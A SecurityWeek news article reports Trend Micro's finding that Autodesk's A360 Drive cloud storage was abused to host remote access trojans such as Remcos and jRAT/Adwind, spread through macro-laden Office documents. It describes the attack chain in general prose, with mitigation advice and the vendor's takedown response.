Security Experts:

Connect with us

Hi, what are you looking for?

SecurityWeekSecurityWeek

Cloud Security

Autodesk A360 Drive Used to Spread Malware

Cloud-based online storage service Autodesk A360 Drive has been recently abused as a malware delivery platform, according to Trend Micro.

Cloud-based online storage service Autodesk A360 Drive has been recently abused as a malware delivery platform, according to Trend Micro.

Functioning in a manner similar to that of cloud storage services such as Google Drive, A360 Drive allows a user to create an account for free and benefit from 5 gigabytes of storage space. The service is part of the Autodesk A360 cloud-based workspace, which allows design and engineering teams to share information to desktops, web, and mobile devices.

On A360 Drive, anyone can upload documents via a browser or desktop, and can also share these files by inviting people to view or edit them. Thus, all that a cybercriminal needs to do to abuse the service is to create an account, upload malicious content, and then embed URLs to this content in the chosen entry vector.

In fact, this is exactly what Trend Micro discovered has happened. Miscreants uploaded a plethora of malware to A360 Drive and started spreading it via macro-enabled Microsoft Word documents and other types of files.

One A360 Drive-hosted archive, the security firm says, included an executable (.EXE) file embedded with an obfuscated Visual Basic file hiding a Zeus/Zbot KINS variant beneath. One Java ARchive (JAR) file discovered on the platform contained an executable file archive that pointed to a variant of the NETWIRE remote access tool.

Another JAR file was found to be a variant of jRAT/Adwind, a piece of malware that can retrieve and exfiltrate a variety of data, including credentials, keystrokes, and multimedia files.

According to Trend Micro, some of the files were hosted via A360 Drive since June 2017, but the practice only surged in August. These files usually contained remote access tools, either obfuscated EXE files or Java archives, and haven’t been used in targeted attacks to date.

When it comes to the global distribution of the observed malware, the U.S., South Africa, France, Italy, Germany, Hong Kong, and Austria emerge as the most affected countries.

One of the analyzed files was an Office DOC document called AMMO REQUEST MOD Turkey.doc, which was uploaded to VirusTotal on August 24 and was distributed during the same period. Malicious macros included in the document were pointing to a PowerShell script designed to download a file from A360 Drive and execute it.

The downloaded payload, a Visual Basic obfuscated executable file, was found to be the Trojanized version of the Remcos remote access tool (RAT), which is advertised, sold, and offered cracked on various websites and forums. The malware was being distributed mainly in European countries such as Croatia, Germany, Greece, and Turkey.

Remcos made headlines in February, but it has been used in attacks since 2016. Recently, the RAT has been distributed via a malicious PowerPoint slideshow embedded with an exploit for CVE-2017-0199. In March, the same tool was found on endpoints infected with the MajikPOS point-of-sale (PoS) malware. Apparently, it was used as MajikPOS’s entry point.

“Securing the use of legitimate system administration tools like PowerShell helps mitigate threats and restrict them from being abused. Cloud-based storage platforms are known for being abused, too, and its misuse often allows malicious artifacts into the workplace’s machines. This can be prevented by ensuring that web traffic is scanned within the enterprise,” Trend Micro notes.

The security firm informed Autodesk on its findings and says they have been working together in taking “down the abused URLs and deploying additional countermeasures to prevent further abuse of A360 Drive.”

Related: PowerPoint Slide Show Files Used to Install Malware

Related: Easy-to-Use Remcos RAT Spotted in Live Attacks

Written By

Ionut Arghire is an international correspondent for SecurityWeek.

Click to comment

Daily Briefing Newsletter

Subscribe to the SecurityWeek Email Briefing to stay informed on the latest threats, trends, and technology, along with insightful columns from industry experts.

Expert Insights

Related Content

Application Security

Cycode, a startup that provides solutions for protecting software source code, emerged from stealth mode on Tuesday with $4.6 million in seed funding.

Malware & Threats

Microsoft plans to improve the protection of Office users by blocking XLL add-ins from the internet.

Cloud Security

VMware vRealize Log Insight vulnerability allows an unauthenticated attacker to take full control of a target system.

Cybercrime

A recently disclosed vBulletin vulnerability, which had a zero-day status for roughly two days last week, was exploited in a hacker attack targeting the...

Application Security

A CSRF vulnerability in the source control management (SCM) service Kudu could be exploited to achieve remote code execution in multiple Azure services.

Application Security

Many developers and security people admit to having experienced a breach effected through compromised API credentials.

Cybercrime

No one combatting cybercrime knows everything, but everyone in the battle has some intelligence to contribute to the larger knowledge base.

Cybercrime

CISA, NSA, and MS-ISAC issued an alert on the malicious use of RMM software to steal money from bank accounts.